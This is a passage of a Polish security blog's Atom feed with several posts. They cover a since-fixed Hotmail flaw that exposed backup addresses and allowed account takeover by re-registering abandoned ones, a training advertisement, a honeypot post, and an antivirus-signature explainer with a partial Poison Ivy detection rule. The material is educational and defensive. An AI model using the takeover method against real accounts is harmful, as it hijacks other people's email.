Metoda, którą dziś chcę omówić, pozwalała przykładowo w ostatnim czasie na uzyskanie całkowitej kontroli nad tysiącami kont poczty w popularnym microsoftowym serwisie Hotmail. Spójrzmy na dostępny &lt;a href=&quot;https://maccount.live.com/ac/resetpwdmain.aspx&quot;&gt;tutaj&lt;/a&gt; mechanizm resetowania hasła w powyższej usłudze.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipOBc7ZW_THo95SjKCa27rhyphenhyphenJtr78Oq4bs35L8zGHMJeWM6TE-u3rZ_jFd7H-X_nMsWuFG56xZoevzbqLUMiT-CrFpzq309RkpxPCNOObhLt4ruuOcimhhQ-Qi5q5zkkmaOq-4URiBPZ4/s1600/Hotmail01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;210&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipOBc7ZW_THo95SjKCa27rhyphenhyphenJtr78Oq4bs35L8zGHMJeWM6TE-u3rZ_jFd7H-X_nMsWuFG56xZoevzbqLUMiT-CrFpzq309RkpxPCNOObhLt4ruuOcimhhQ-Qi5q5zkkmaOq-4URiBPZ4/s400/Hotmail01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Na pierwszy rzut oka wszystko wydaje się być w jak najlepszym porządku. Mamy możliwość skorzystania z mechanizmu resetowania hasła z wykorzystaniem zapasowego adresu e-mail zdefiniowanego na etapie zakładania naszego konta, a sam pomocniczy adres nie zostaje wyświetlony. Generalnie rzecz biorąc tego typu funkcja resetowania haseł jest uznawana za dość bezpieczną. Z pewnością jest w praktyce o wiele bezpieczniejsza od mechanizmu pytań pomocniczych (Panieńskie nazwisko matki?), niestety jest tak do czasu, gdy intruz może poznać pełne brzmienie adresów pomocniczych należących do poszczególnych użytkowników...&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jak się okazuje, w przypadku Hotmaila, w celu odkrycia całego adresu pomocniczego należącego do konkretnego użytkownika wystarczyło tylko... wyświetlić źródło powyższej strony! Obecnie błąd ten został już naprawiony, zastanówmy się jednak, na co tego typu sytuacja w praktyce pozwalała?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Na pierwszy rzut oka wydaje się, że powyższa przypadłość Hotmaila pozwalała jedynie na poznanie innego adresu e-mailowego należącego do konkretnego użytkownika. Nadal nie widać więc żadnego realnego zagrożenia dla samego konta w usłudze Hotmail? Nic bardziej mylnego. W praktyce wielu użytkowników serwisów pocztowych na etapie rejestracji konta jako adres pomocniczy podaje jakiś adres wymyślony (np. nie_podam_ci_mojego_maila@gmail.com) lub też jakiś własny, lecz jedynie okazjonalnie (lub nawet w ogóle już nie używany) używany adres. Bardzo często użytkownik korzystając potem z nowego adresu zapomina całkowicie o starym, który z powodu długiej nieaktywności zostaje po jakimś czasie (np. 6 miesięcy) &amp;nbsp;po prostu usunięty.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
W efekcie potencjalny intruz może zresetować hasło użytkownika z wykorzystaniem nieistniejącego adresu e-mail, czyli np. nie_podam_ci_mojego_maila@gmail.com. Jak tego dokonać? Wystarczy tylko założyć takie właśnie konto w usłudze Gmail i skorzystać z funkcji resetowania hasła... W tym momencie intruz uzyskuje kontrolę nad kontem pocztowym, a prawowity użytkownik usługi nie ma zielonego pojęcia dlaczego stało się tak, że nie może się zalogować na własne konto.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Z pewnością tego typu problem nie dotyczył jedynie Hotmaila i podobne sytuacje mogą mieć nadal miejsce w przypadku innych usług, zachęcam więc do sprawdzenia, czy przypadkiem usługa pocztowa (być może również usługi internetowe innego typu?) z której korzystacie, również w jakiś sposób nie ujawnia zapasowych adresów e-mail pozwalających na zmianę hasła dostępowego. Warto również sprawdzić, czy podane przez nas adresy zapasowe na pewno istnieją i czy to na pewno my mamy nad nimi kontrolę!&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wszystko to jasno obrazuje, że nawet osoby przywiązujące dużą wagę do bezpieczeństwa, mogą paść ofiarą udanych ataków. Niestety nigdy nie jesteśmy w stanie przewidzieć wszystkich potencjalnych scenariuszy ataków, zazwyczaj nie możemy również sami zapobiec zagrożeniom związanym z lukami obecnymi w wykorzystywanych przez nas usługach oraz serwisach internetowych... jak więc bronić się przed tego typu zagrożeniami?&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/5556619617930345981/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/02/kolejny-sposob-na-przejecie-tysiecy.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/5556619617930345981'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/5556619617930345981'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/02/kolejny-sposob-na-przejecie-tysiecy.html' title='Kolejny sposób na przejęcie tysięcy kont poczty e-mail?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCCE7cHEYZa__B_hyphenhyphen3PfKfkyDhc883Q3fPgk5sg-oVoW1ZgrZKaF21a_F5r4ZBb0uzqZXgs6OzNv5m2KmpIKtDjELtJzKZ7EESb76hDHJdpOdouBdIbkMwp2a08wTzraMdJZAcDj_0ws4/s72-c/Hotmail.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-8836104197358608601</id><published>2011-02-02T21:52:00.001+01:00</published><updated>2011-02-02T21:53:32.842+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Edukacja"/><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Szkolenie z bezpieczeństwa sieci (rabat 150 zł)</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/02/szkolenie-z-bezpieczenstwa-sieci-rabat.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12clUplG71aDyUyXY5GRcbyZ32eCjBFoIa8v56qOqSwNw-LMR2CjJ7RmDpG6GMlSlB-r2fb7A2OhScMv41Pua4UwH1EHAb7msQgSuSGrMwGK7bVz5Rq43x1FxnRLLrTlkZNEL8Y2zqsYq/s320/Securitum.png&quot; /&gt;&lt;/a&gt;Wszystkie osoby zainteresowane zagadnieniami związanymi z bezpieczeństwem sieci komputerowych, zachęcam do wzięcia udziału w szkoleniu autorskim organizowanym przez firmę &lt;a href=&quot;http://www.securitum.pl/&quot;&gt;Securitum&lt;/a&gt; w dniach: 01-03 marca 2011, w Krakowie. Świetny dobór tematów, nacisk na praktyczne umiejętności oraz rozpatrywanie omawianych zagadnień zarówno z perspektywy intruza, jak i administratora systemu, wszystko to stanowi o unikalności szkolenia &lt;a href=&quot;http://www.securitum.pl/oferta/szkolenia/bezpieczenstwo-sieci-szkolenie&quot;&gt;Bezpieczeństwo sieci&lt;/a&gt;.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Podczas warsztatów prezentowane są realne podatności i metody ochrony przed nimi. W ramach warsztatów możliwe są dodatkowo konsultacje z prowadzącym szkolenie -- w dowolnej tematyce związanej z bezpieczeństwem sieci.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.securitum.pl/&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;65&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgybBrzRsV9mTYJPafQSyhY5m0fF6w0zYabZ2ycmdBQ4xgjiFH0G_0sCJABd5nfOa-H44fToC11ygFEZonyEFbYy3WnHOQ_q6aJDpNqprcO0YhaSpRk6DDaiBR6MmL8gur7JnAKCFw7uF05/s400/securitum_logo.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
W trakcie trzydniowych warsztatów:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;Podsłuchasz rozmowę VoIP korzystając z fizycznych telefonów IP dostępnych w LAB-ie&lt;/li&gt;
&lt;li&gt;Zobaczysz w jaki sposób można skonfigurować i ominąć systemy klasy IPS (Intrusion Prevention System).&lt;/li&gt;
&lt;li&gt;Wykonasz atak na protokół routingu.&lt;/li&gt;
&lt;li&gt;Wykonasz atak klasy MitM w środowisku switchowanym - na serwis chroniony przez SSL.&lt;/li&gt;
&lt;li&gt;Wykonasz przechwycenie i modyfikację (niemal) dowolnej komunikacji sieciowej.&lt;/li&gt;
&lt;li&gt;Nauczysz się w sprawny sposób wykrywać podatności w sieci.&lt;/li&gt;
&lt;li&gt;Wykonasz (niemal) dowolną fragmentację ruchu IP.&lt;/li&gt;
&lt;li&gt;Złamiesz dostęp do sieci chronionej przez IPsec.&lt;/li&gt;
&lt;li&gt;Zobaczysz w jaki sposób otrzymać dostęp na poziomie systemu operacyjnego - poprzez SQL injection.&lt;/li&gt;
&lt;li&gt;Zbudujesz własne narzędzie do testowania bezpieczeństwa sieci.&lt;/li&gt;
&lt;li&gt;Otrzymasz w prezencie anglojęzyczną książkę o monitoringu bezpieczeństwa sieci - niedostępną na polskim rynku.&lt;/li&gt;
&lt;li&gt;Nauczysz się metod ochrony sieci przed atakami.&lt;/li&gt;
&lt;li&gt;I wiele, wiele więcej...&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Warsztaty kierowane są do:&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;Pracowników departamentów bezpieczeństwa firm.&lt;/li&gt;
&lt;li&gt;Administratorów systemów.&lt;/li&gt;
&lt;li&gt;Pracowników działów IT.&lt;/li&gt;
&lt;li&gt;Osób odpowiedzialnych za wdrażanie zabezpieczeń w organizacjach.&lt;/li&gt;
&lt;li&gt;Osób pragnących usystematyzować / poszerzyć swoją wiedzę z zakresu bezpieczeństwa IT.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Zajęcia odbędą się z wykorzystaniem laptopów kursantów (formuła &lt;i&gt;bring your own laptop&lt;/i&gt;), jednak przed szkoleniem każdy uczestnik otrzyma m.in. maszynę wirtualną z narzędziami, które będą wykorzystane podczas zajęć. Dodatkowe informacje oraz pełna agenda: &lt;a href=&quot;http://www.securitum.pl/oferta/szkolenia/bezpieczenstwo-sieci-szkolenie&quot;&gt;szkolenie z bezpieczeństwa sieci&lt;/a&gt;.&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: auto;&quot;&gt;
&lt;b&gt;Na wszystkich czytelników HCSL czekają kupony rabatowe&lt;/b&gt;. Wszyscy uczestnicy (firmy i osoby prywatne), którzy powołają się na serwis HARD CORE SECURITY LAB, mogą liczyć na zniżkę w wysokości 150 zł. Biorąc pod uwagę to, że tego typu profesjonalne, praktyczne szkolenia są w Polsce prawdziwą rzadkością, zachęcam wszystkich zainteresowanych do skorzystania z okazji do pogłębienia swej wiedzy z zakresu bezpieczeństwa sieci komputerowych.&lt;/div&gt;
&lt;div style=&quot;text-align: auto;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/8836104197358608601/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/02/szkolenie-z-bezpieczenstwa-sieci-rabat.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/8836104197358608601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/8836104197358608601'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/02/szkolenie-z-bezpieczenstwa-sieci-rabat.html' title='Szkolenie z bezpieczeństwa sieci (rabat 150 zł)'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi12clUplG71aDyUyXY5GRcbyZ32eCjBFoIa8v56qOqSwNw-LMR2CjJ7RmDpG6GMlSlB-r2fb7A2OhScMv41Pua4UwH1EHAb7msQgSuSGrMwGK7bVz5Rq43x1FxnRLLrTlkZNEL8Y2zqsYq/s72-c/Securitum.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-6985379352859452336</id><published>2011-02-01T19:55:00.002+01:00</published><updated>2011-02-01T19:57:48.590+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo sieci komputerowych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Najgorszy haker wszech czasów?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/02/najgorszy-haker-wszech-czasow.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPu7V5DbIP5WX1CVImdFRWo2zLmpEW5yodxYNSC8BhlyemmTq3RVkcD0T7WhtFAJznuKc_m-ap0CKjsqfkBdDqmBZ1HcWlPpC-AYS-Uh3Q9ZjcD-101vSLo56yMudaDEPYxHB3YfKm8mc/s1600/Pink+hat.png&quot; /&gt;&lt;/a&gt;W miarę obiektywne wskazanie najlepszego hakera wszech czasów jest z pewnością nie lada wyzwaniem. W przeciwieństwie do &lt;a href=&quot;http://www.hcsl.pl/2010/05/zapomniany-film-o-hakerach-trafi-do.html&quot;&gt;ikon hack-kultury&lt;/a&gt;, prawdopodobnie osoba taka nie jest nawet w ogóle publicznie znana. Za to dość łatwo możemy nawet osobiście zbierać kandydatury do miana najgorszego hakera wszech czasów. Wystarczy tylko przygotować własny honeypot. Poza tym, podglądanie domorosłych włamywaczy penetrujących nasz system&amp;nbsp;– przynętę, może być naprawdę zabawne. Z resztą sami zobaczcie!&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
Oto zapis starań pewnego włamywacza walczącego zaciekle z niegościnnym systemem&amp;nbsp;– przynętą.&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&quot;&quot; class=&quot;youtube-player&quot; frameborder=&quot;0&quot; height=&quot;390&quot; src=&quot;http://www.youtube.com/embed/oJagxe-Gvpw?rel=0&quot; title=&quot;YouTube video player&quot; type=&quot;text/html&quot; width=&quot;640&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Prawda, że honeypot może być źródłem świetnej zabawy? Wszystko mogę zrozumieć, ale po co mu (jej?) ten W2Ksp3.exe?&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/6985379352859452336/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/02/najgorszy-haker-wszech-czasow.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6985379352859452336'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/6985379352859452336'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/02/najgorszy-haker-wszech-czasow.html' title='Najgorszy haker wszech czasów?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPu7V5DbIP5WX1CVImdFRWo2zLmpEW5yodxYNSC8BhlyemmTq3RVkcD0T7WhtFAJznuKc_m-ap0CKjsqfkBdDqmBZ1HcWlPpC-AYS-Uh3Q9ZjcD-101vSLo56yMudaDEPYxHB3YfKm8mc/s72-c/Pink+hat.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-2792848039809454426</id><published>2011-01-31T00:01:00.004+01:00</published><updated>2011-01-31T00:06:42.701+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>W jaki sposób antywirusy rozpoznają złośliwe programy?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/w-jaki-sposob-antywirusy-rozpoznaja.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ_IsPloEzFd5esqFN_dmNN4MKsNJj4qKKGBwbbT8QAivMKhRqMd9lUCXxROH3Ml7VRQHwSh5eMBzfT1WI_OSm09zX0bwE5KvbCnGCbSxVGwUAzovuIpA_LcLkRsXXYsGKJFESIRoufao/s1600/Virus.png&quot; /&gt;&lt;/a&gt;Antywirusy są prawdopodobnie najpopularniejszym typem oprogramowania ochronnego oraz w ogóle jednymi z częściej stosowanych programów. Program tego typu najczęściej kojarzy nam się z rezydentnym monitorem śledzącym w czacie rzeczywistym wszystkie działania mające miejsce w naszym systemie operacyjnym i zdolnym do rozpoznania niezliczonej ilości zagrożeń. Jak to się jednak dzieje, że antywirusy są w stanie w miarę skutecznie rozpoznać setki tysięcy najróżniejszych złośliwych programów?&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Większość użytkowników programów antywirusowych praktycznie w ogóle nie zdaje sobie sprawy z tego, w jaki sposób ich oprogramowanie ochronne radzi sobie z lokalizowaniem potencjalnych zagrożeń. Choćby podstawowa wiedza z tego zakresu jest jednak bardzo przydatna, bowiem pozwoli nam na lepsze zrozumienie &lt;a href=&quot;http://www.hcsl.pl/2010/07/jeszcze-raz-o-tym-jak-w-banalny-sposob.html&quot;&gt;słabych punktów dzisiejszego oprogramowania antywirusowego&lt;/a&gt;, a nawet &lt;a href=&quot;http://www.hcsl.pl/2009/08/aktualizacje-oprogramowania-grozniejsze.html&quot;&gt;realnych zagrożeń&lt;/a&gt; związanych z ich codziennym użytkowaniem! Wszystko to powinno nam więc pozwolić na bardziej świadome stosowanie dzisiejszych technologii ochronnych.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Najważniejszą częścią każdego dzisiejszego programu antywirusowego (oprócz tzw. silnika) jest baza sygnatur wirusów. Sygnatury wirusów to pewne (zazwyczaj bardzo zwięzłe) informacje, które pozwalają na w miarę jednoznaczne zidentyfikowanie danego typu lub nawet całej rodziny wirusów. Najpopularniejsze obecnie trzy typy sygnatur, to sygnatury powstałe z wykorzystaniem funkcji skrótu, sygnatury (wzorce) bajtowe oraz sygnatury heurystyczne. Spójrzmy pokrótce na wady oraz zalety wspomnianych metod identyfikowania potencjalnych zagrożeń.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Najprostszą oraz najłatwiejszą do praktycznego zastosowania metodą tworzenia sygnatur złośliwego oprogramowania jest oczywiście wykorzystanie do tego celu popularnych funkcji skrótu (np. MD5). Tzw. skrót (hash) powstaje w wyniku zastosowania matematycznej funkcji, która to w praktyce pozwala na przyporządkowanie dowolnie dużej liczbie (czyli np. dowolnemu programowi lub danym o dowolnej wielkości) pewnej stosunkowo niewielkiej wartości o ustalonym rozmiarze. Tak utworzony skrót dla znanego już złośliwego programu pozwala w przyszłości na w miarę jednoznaczne zidentyfikowanie danego wirusa.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Niestety zastosowanie tego typu sygnatur jest obarczone sporymi wadami. Nawet najdrobniejsza zmiana w kodzie złośliwego oprogramowania (nowy wariant wirusa, malware polimorficzny, itp.) oznacza, że stara sygnatura nie wykryje już nowych wersji wirusa. Poza tym, kolizje funkcji skrótu (czyli przypadki, gdy dla różnych wiadomości lub programów otrzymamy te same skróty) potencjalnie mogą być przyczyną bardzo niebezpiecznych dla naszego systemu &lt;a href=&quot;http://www.hcsl.pl/2009/08/aktualizacje-oprogramowania-grozniejsze.html&quot;&gt;wykryć fałszywych&lt;/a&gt;. Wszystko to powoduje, że rozwiązania antywirusowe w żadnym razie nie mogą polegać jedynie na tego typu sygnaturach.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Pewnym rozwiązaniem w przypadku malware&#39;u polimorficznego lub złośliwych plików zawierających zmienne dane może być natomiast tzw. &lt;i&gt;fuzzy hashing&lt;/i&gt;. Metody te generalnie pozwalają na utworzenie wspólnej sygnatury dla różnych danych wejściowych, które to jednak zawierają pewne cechy wspólne (np. programy zawierające wspólne fragmenty kodu). Tego typu metody są jednak dość wymagające pod względem obliczeniowym oraz nie gwarantują wcale bardzo dużej skuteczności. Wszystkich zainteresowanych tą tematyką zachęcam do zapoznania się z projektem &lt;a href=&quot;http://ssdeep.sourceforge.net/&quot;&gt;ssdeep&lt;/a&gt;, w ramach którego powstał program implementujący metodę generowania skrótów CTPH (ang. &lt;i&gt;Context Triggered Piecewise Hashes&lt;/i&gt;).&lt;br /&gt;
&lt;br /&gt;
Kolejnym popularnym sposobem generowania sygnatur złośliwego oprogramowania jest wykorzystywanie do tego celu pewnych wybranych sekwencji bajtów obecnych w złośliwym kodzie lub w wykorzystywanych przez niego danych. Identyczne wzorce bajtowe możemy zazwyczaj odnaleźć we wszystkich wariantach danego złośliwego programu, dlatego też metoda ta jest w praktyce dość skuteczna w walce z całymi rodzinami wirusów. Natomiast prostota tej metody sprawia, że jest ona wykorzystywana praktycznie od zarania antywirusowych dziejów, aż po dziś dzień. Oczywiście metoda ta również może generować wykrycia fałszywe. Jeśli założymy, że sygnatura (wzorzec bajtowy) pewnego wirusa to &quot;FF 5c 0c 4d c2 21 1d 18&quot;, to oczywiście dowolny plik (nawet najzwyklejszy plik tekstowy) zawierający taki ciąg bajtów będzie generował alert antywirusowy.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Współczesne programy antywirusowe wykorzystują również sygnatury heurystyczne. Generalnie mianem metod heurystycznych określa się w przypadku antywirusów wszystkie inne metody wykrywania zagrożeń, oprócz powyższych tradycyjnych metod sygnaturowych. Metody heurystyczne stanowią najbardziej skomplikowaną część arsenału każdego antywirusa. Ponadto praktycznie każdy producent antywirusów rozwija własne zastrzeżone algorytmy heurystyczne i właśnie na tym polu w największym stopniu może się wykazać swą innowacyjnością i potencjałem (tradycyjne sygnatury są zazwyczaj niemal identyczne w przypadku wielu różnych producentów -- znane jest nawet zjawisko wymieniania się tradycyjnymi sygnaturami z innymi producentami).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
W praktyce heurystyczne metody wykrywania wirusów mogą się sprowadzać przykładowo do śledzenia wywołań API, zastosowania sand-boxingu połączonego ze śledzeniem zachowań poszczególnych programów, śledzenia anomalii występujących w systemie operacyjnym oraz systemie plików i wielu innych podobnych technik. W praktyce więc, sygnatura heurystyczna może przykładowo przyjąć formę kilku warunków śledzących wystąpienie sekwencji określonych wywołań API, które są charakterystyczne dla jakiejś rodziny wirusów lub nawet całej klasy złośliwego oprogramowania. Przykładowo dla złośliwego programu znanego jako &lt;i&gt;Poison Ivy&lt;/i&gt;, heurystyczna sygnatura może mieć następującą postać:&lt;br /&gt;
&lt;code&gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;Rule A&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;An API call to RtlMoveMemory with a string of &quot;SOFTWARE\Classes\http\shell\open\commandV&quot;&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;Rule B&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;An API call to CreateMutexA with a string of &quot;)!VoqA.I4&quot;&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;Rule C&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;An API call to GetSystemDirectory&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;if ( Rule A then Rule B then Rule C )&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;&amp;nbsp;then&amp;nbsp;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
